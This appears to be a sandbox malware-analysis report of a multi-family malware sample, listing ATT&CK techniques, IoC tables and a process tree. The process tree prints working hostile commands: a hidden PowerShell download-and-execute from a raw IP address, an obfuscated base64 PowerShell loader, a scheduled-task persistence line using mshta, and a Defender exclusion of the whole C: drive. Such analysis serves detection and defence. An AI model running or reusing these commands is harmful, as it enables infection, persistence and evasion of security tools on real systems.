Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 3 IoCs

defense_evasion

pid	Process
3556	timeout.exe
3764	timeout.exe
19684	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3800	taskkill.exe
5824	taskkill.exe
4704	taskkill.exe
4452	taskkill.exe
5784	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133877153222343085"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rapes.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
26964	reg.exe
5852	reg.exe
4912	reg.exe
19504	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3544	schtasks.exe
4236	schtasks.exe
2160	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5308	powershell.exe

Suspicious behavior: EnumeratesProcesses 62 IoCs

pid	Process
3852	powershell.exe
3852	powershell.exe
4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
2980	rapes.exe
2980	rapes.exe
5308	powershell.exe
5308	powershell.exe
5128	powershell.exe
5128	powershell.exe
5128	powershell.exe
4424	MSBuild.exe
4424	MSBuild.exe
4424	MSBuild.exe
4424	MSBuild.exe
1436	powershell.exe
1436	powershell.exe
1436	powershell.exe
4888	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
4888	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
6116	powershell.exe
6116	powershell.exe
5856	MSBuild.exe
5856	MSBuild.exe
6116	powershell.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
3624	powershell.exe
3624	powershell.exe
3624	powershell.exe
3536	powershell.exe
3536	powershell.exe
3536	powershell.exe
4396	MSBuild.exe
4396	MSBuild.exe
4396	MSBuild.exe
4396	MSBuild.exe
5856	MSBuild.exe
5856	MSBuild.exe
2924	chrome.exe
2924	chrome.exe
1532	483d2fa8a0d53818306efeb32d3.exe
1532	483d2fa8a0d53818306efeb32d3.exe
2284	202a17038f.exe
2284	202a17038f.exe
2284	202a17038f.exe
2284	202a17038f.exe
2284	202a17038f.exe
2284	202a17038f.exe
4008	Bell_Setup16.tmp
4008	Bell_Setup16.tmp
5760	regsvr32.exe
5760	regsvr32.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe
5856	MSBuild.exe
5856	MSBuild.exe
3404	PowerShell.exe
3404	PowerShell.exe
3404	PowerShell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
652	Process not Found
652	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	3852	powershell.exe
Token: SeDebugPrivilege	5308	powershell.exe
Token: SeDebugPrivilege	5128	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	6116	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	2924	chrome.exe
Token: SeCreatePagefilePrivilege	2924	chrome.exe
Token: SeIncreaseQuotaPrivilege	3996	powershell.exe
Token: SeSecurityPrivilege	3996	powershell.exe
Token: SeTakeOwnershipPrivilege	3996	powershell.exe
Token: SeLoadDriverPrivilege	3996	powershell.exe
Token: SeSystemProfilePrivilege	3996	powershell.exe
Token: SeSystemtimePrivilege	3996	powershell.exe
Token: SeProfSingleProcessPrivilege	3996	powershell.exe
Token: SeIncBasePriorityPrivilege	3996	powershell.exe
Token: SeCreatePagefilePrivilege	3996	powershell.exe
Token: SeBackupPrivilege	3996	powershell.exe
Token: SeRestorePrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeSystemEnvironmentPrivilege	3996	powershell.exe
Token: SeRemoteShutdownPrivilege	3996	powershell.exe
Token: SeUndockPrivilege	3996	powershell.exe
Token: SeManageVolumePrivilege	3996	powershell.exe
Token: 33	3996	powershell.exe
Token: 34	3996	powershell.exe
Token: 35	3996	powershell.exe
Token: 36	3996	powershell.exe
Token: SeDebugPrivilege	3404	PowerShell.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3108	accde9cdf4.exe
3108	accde9cdf4.exe
3108	accde9cdf4.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
2924	chrome.exe
4008	Bell_Setup16.tmp

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3108	accde9cdf4.exe
3108	accde9cdf4.exe
3108	accde9cdf4.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 6108	2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2756 wrote to memory of 6108	2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2756 wrote to memory of 6108	2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2756 wrote to memory of 6072	2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 2756 wrote to memory of 6072	2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 2756 wrote to memory of 6072	2756	2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 6108 wrote to memory of 4236	6108	cmd.exe	90
PID 6108 wrote to memory of 4236	6108	cmd.exe	90
PID 6108 wrote to memory of 4236	6108	cmd.exe	90
PID 6072 wrote to memory of 3852	6072	mshta.exe	91
PID 6072 wrote to memory of 3852	6072	mshta.exe	91
PID 6072 wrote to memory of 3852	6072	mshta.exe	91
PID 3852 wrote to memory of 4884	3852	powershell.exe	100
PID 3852 wrote to memory of 4884	3852	powershell.exe	100
PID 3852 wrote to memory of 4884	3852	powershell.exe	100
PID 4884 wrote to memory of 2980	4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE	101
PID 4884 wrote to memory of 2980	4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE	101
PID 4884 wrote to memory of 2980	4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE	101
PID 2980 wrote to memory of 4032	2980	rapes.exe	105
PID 2980 wrote to memory of 4032	2980	rapes.exe	105
PID 2980 wrote to memory of 4032	2980	rapes.exe	105
PID 4032 wrote to memory of 3276	4032	cmd.exe	107
PID 4032 wrote to memory of 3276	4032	cmd.exe	107
PID 4032 wrote to memory of 3276	4032	cmd.exe	107
PID 3276 wrote to memory of 5308	3276	cmd.exe	109
PID 3276 wrote to memory of 5308	3276	cmd.exe	109
PID 3276 wrote to memory of 5308	3276	cmd.exe	109
PID 5308 wrote to memory of 5128	5308	powershell.exe	110
PID 5308 wrote to memory of 5128	5308	powershell.exe	110
PID 5308 wrote to memory of 5128	5308	powershell.exe	110
PID 2980 wrote to memory of 5592	2980	rapes.exe	112
PID 2980 wrote to memory of 5592	2980	rapes.exe	112
PID 2980 wrote to memory of 5592	2980	rapes.exe	112
PID 5592 wrote to memory of 1868	5592	amnew.exe	113
PID 5592 wrote to memory of 1868	5592	amnew.exe	113
PID 5592 wrote to memory of 1868	5592	amnew.exe	113
PID 2980 wrote to memory of 116	2980	rapes.exe	114
PID 2980 wrote to memory of 116	2980	rapes.exe	114
PID 2980 wrote to memory of 116	2980	rapes.exe	114
PID 116 wrote to memory of 6020	116	apple.exe	115
PID 116 wrote to memory of 6020	116	apple.exe	115
PID 116 wrote to memory of 6020	116	apple.exe	115
PID 6020 wrote to memory of 3104	6020	22.exe	117
PID 6020 wrote to memory of 3104	6020	22.exe	117
PID 3104 wrote to memory of 1224	3104	cmd.exe	119
PID 3104 wrote to memory of 1224	3104	cmd.exe	119
PID 3104 wrote to memory of 1224	3104	cmd.exe	119
PID 1224 wrote to memory of 5800	1224	22.exe	120
PID 1224 wrote to memory of 5800	1224	22.exe	120
PID 5800 wrote to memory of 4552	5800	cmd.exe	122
PID 5800 wrote to memory of 4552	5800	cmd.exe	122
PID 5800 wrote to memory of 2580	5800	cmd.exe	123
PID 5800 wrote to memory of 2580	5800	cmd.exe	123
PID 5800 wrote to memory of 3556	5800	cmd.exe	124
PID 5800 wrote to memory of 3556	5800	cmd.exe	124
PID 5800 wrote to memory of 3240	5800	cmd.exe	126
PID 5800 wrote to memory of 3240	5800	cmd.exe	126
PID 5800 wrote to memory of 4748	5800	cmd.exe	127
PID 5800 wrote to memory of 4748	5800	cmd.exe	127
PID 5800 wrote to memory of 1192	5800	cmd.exe	128
PID 5800 wrote to memory of 1192	5800	cmd.exe	128
PID 5800 wrote to memory of 5496	5800	cmd.exe	129
PID 5800 wrote to memory of 5496	5800	cmd.exe	129
PID 5800 wrote to memory of 1964	5800	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn yDQgJmaxz4C /tr "mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6108
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn yDQgJmaxz4C /tr "mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4236
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\OJg06BvQe.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6072
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3852
  - - C:\Users\Admin\AppData\Local\Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
      "C:\Users\Admin\AppData\Local\Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4884
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2980
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4032
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5128
      - C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5592
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
